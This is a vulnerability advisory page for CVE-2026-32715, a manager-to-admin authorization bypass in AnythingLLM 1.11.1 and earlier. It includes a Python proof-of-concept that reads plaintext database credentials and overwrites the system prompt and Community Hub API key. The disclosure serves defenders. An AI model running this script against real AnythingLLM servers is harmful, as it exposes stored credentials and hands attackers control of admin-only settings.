Security Vulnerability Report
CVE-2026-32715 CVSS 3.8 LOW

CVE-2026-32715

Published: 2026-03-16 14:19:42
Last Modified: 2026-03-16 20:00:30

Description

AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. In 1.11.1 and earlier, the two generic system-preferences endpoints allow manager-role access, while every other surface that touches the same settings is restricted to admin only. Because of this inconsistency, a manager can call the generic endpoints directly to read plaintext SQL database credentials and overwrite admin-only global settings such as the default system prompt and the Community Hub API key.

CVSS Details

CVSS Score
3.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N
Exploitability Score
1.2
Impact Score
2.5

Configurations (Affected Products)

cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:* - VULNERABLE
AnythingLLM < 1.11.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-32715 PoC - AnythingLLM Privilege Bypass
# Target: AnythingLLM <= 1.11.1
# Vulnerability: Manager role can access admin-only endpoints

BASE_URL = "http://target-server:3001"


# Step 1: Login as manager user
def login_manager(username, password):
    """Authenticate as manager user to obtain session token"""
    login_url = f"{BASE_URL}/api/auth/login"
    data = {
        "email": username,
        "password": password
    }
    response = requests.post(login_url, json=data)
    if response.status_code == 200:
        return response.json().get('token')
    return None


# Step 2: Access system preferences (should be admin-only)
def access_system_preferences(token):
    """Exploit: Access admin-only system preferences as manager"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    # This endpoint should require admin role but accepts manager
    prefs_url = f"{BASE_URL}/api/system-preferences"
    response = requests.get(prefs_url, headers=headers)
    return response.json()


# Step 3: Read database credentials (exposed plaintext SQL credentials)
def read_db_credentials(token):
    """Extract database credentials from preferences response"""
    prefs = access_system_preferences(token)
    # Look for database connection strings in response
    if 'data' in prefs:
        for item in prefs['data']:
            if 'database' in str(item).lower() or 'sql' in str(item).lower():
                print(f"[+] Found sensitive data: {item}")
                return item
    return None


# Step 4: Modify admin-only settings
def modify_system_settings(token, settings):
    """Modify system prompt and API keys (admin-only settings)"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    modify_url = f"{BASE_URL}/api/system-preferences"
    response = requests.post(modify_url, headers=headers, json=settings)
    return response.status_code == 200


# Main execution
if __name__ == "__main__":
    token = login_manager("[email protected]", "manager_password")
    if token:
        print("[+] Manager login successful")
        print("[*] Exploiting privilege bypass...")
        creds = read_db_credentials(token)
        if creds:
            print(f"[!] Database credentials exposed: {creds}")
        # Modify system prompt
        modify_system_settings(token, {
            "systemPrompt": "Malicious system prompt",
            "communityHubApiKey": "attacker-controlled-key"
        })
        print("[+] System settings modified")
    else:
        print("[-] Authentication failed")
```

References

https://github.com/Mintplex-Labs/anything-llm/commit/732eac6fa89f43288bbb65ecc6298ebcd96b7aeb - Patch
https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-wfq3-65gm-3g2p - Exploit, Vendor Advisory

Weakness

CWE-863 (Incorrect Authorization)

Record Status

Analyzed (affected versions: up to and including 1.11.1)